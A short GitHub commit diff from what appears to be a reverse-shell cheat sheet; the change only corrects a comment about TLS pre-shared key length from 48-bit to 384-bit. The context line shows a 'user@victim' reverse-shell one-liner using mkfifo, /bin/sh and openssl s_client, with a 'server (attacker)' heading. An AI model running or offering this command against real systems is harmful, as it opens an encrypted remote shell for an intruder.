This commit is contained in:
Artiom Mocrenco 2020-07-08 18:01:12 +03:00 committed by GitHub
parent 2d7d6d6eed
commit 62443a3753
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -177,7 +177,7 @@ user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -
TLS-PSK (does not rely on PKI or self-signed certificates)
```bash
# generate 48-bit PSK
# generate 384-bit PSK
# use the generated string as a value for the two PSK variables from below
openssl rand -hex 48
# server (attacker)